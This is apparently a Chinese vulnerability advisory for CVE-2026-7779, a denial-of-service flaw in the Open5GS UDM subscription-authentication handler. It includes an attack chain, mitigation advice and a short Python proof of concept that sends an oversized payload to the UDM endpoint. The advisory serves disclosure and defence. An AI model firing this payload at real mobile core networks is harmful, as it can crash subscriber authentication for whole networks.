CVE-2026-7779 CVSS 4.3 中危

CVE-2026-7779 Open5GS拒绝服务漏洞

披露日期: 2026-05-04

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-7779

漏洞类型

拒绝服务

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Open5GS

漏洞概述

Open5GS版本2.7.7及之前版本被发现存在一个安全缺陷。该漏洞具体位于源码文件`/src/udm/nudr-handler.c`中的`udm_nudr_dr_handle_subscription_authentication`函数内，影响了认证订阅端点组件。由于未对特定输入进行充分验证，攻击者可以通过网络发送特制的恶意数据包进行操纵，从而触发拒绝服务条件。该漏洞允许远程利用，且公开渠道已发布相关的利用代码，增加了被攻击的风险，目前项目方尚未对此问题做出响应。

技术细节

该漏洞源于Open5GS中UDM（统一数据管理）组件处理订阅认证请求时的逻辑缺陷。具体而言，在文件`/src/udm/nudr-handler.c`中的`udm_nudr_dr_handle_subscription_authentication`函数未对传入的`authentication-subscription`端点数据进行严格的边界检查或异常处理。攻击者无需用户交互，只需具备低权限网络访问权限，即可构造恶意的SBI（Service Based Interface）接口请求。当Open5GS尝试解析并处理这些特制数据包时，会触发内存访问违例或空指针引用，导致UDM服务进程崩溃。由于UDM负责存储用户订阅数据，其瘫痪将导致核心网无法处理新的用户注册或认证请求，从而造成整个网络的拒绝服务。利用该漏洞需要攻击者能够访问Open5GS的SBI接口端口（通常为HTTP/HTTPS服务）。

攻击链分析

STEP 1

侦察

攻击者扫描网络寻找暴露的Open5GS SBI接口，特别是UDM组件的端口（默认为8000）。

STEP 2

访问

攻击者获取网络访问权限，可能需要低权限凭证或利用网络可达性直接访问接口。

STEP 3

利用

向`udm_nudr_dr_handle_subscription_authentication`对应的API端点发送特制的恶意HTTP请求，触发解析逻辑错误。

STEP 4

影响

Open5GS的UDM服务进程崩溃或挂起，导致核心网无法处理用户认证，实现拒绝服务攻击。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import json

# Target configuration
target_url = "http://<target-ip>:8000/nudr-dr/v1/subscription-data/imsi-1234567890/authentication-data"

# Malformed payload to trigger the DoS in udm_nudr_dr_handle_subscription_authentication
# Sending unexpected or large data structure to cause parsing failure
payload = {
    "authenticationMethod": "5G_AKA",
    "supi": "imsi-1234567890",
    "servingNetworkName": "5G:mnc001.mcc001",
    "resynchronizationInfo": {
        "auts": "malicious_buffer_overflow_data_" + "A" * 10000
    }
}

headers = {
    "Content-Type": "application/json",
    "Accept": "application/json"
}

try:
    print(f"Sending exploit to {target_url}...")
    response = requests.post(target_url, data=json.dumps(payload), headers=headers, timeout=5)
    print(f"Response status code: {response.status_code}")
except requests.exceptions.RequestException as e:
    print(f"Request failed (possible DoS triggered): {e}")

影响范围

Open5GS <= 2.7.7

防御指南

临时缓解措施

由于官方尚未发布补丁，建议立即在网络边界部署访问控制列表（ACL），仅允许受信任的核心网网元IP地址访问Open5GS的UDM服务接口。同时，应加强对UDM服务的实时监控，配置自动重启机制以在服务崩溃时尝试恢复，并收集崩溃日志用于后续分析。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-7779
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-7779
3 Details https://www.cvedetails.com/cve/CVE-2026-7779/
4 VulDB https://vuldb.com/cve/CVE-2026-7779
5 Link https://github.com/open5gs/open5gs/
6 Link https://github.com/open5gs/open5gs/issues/4418
7 Link https://vuldb.com/submit/806249
8 Link https://vuldb.com/vuln/360976
9 Link https://vuldb.com/vuln/360976/cti

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表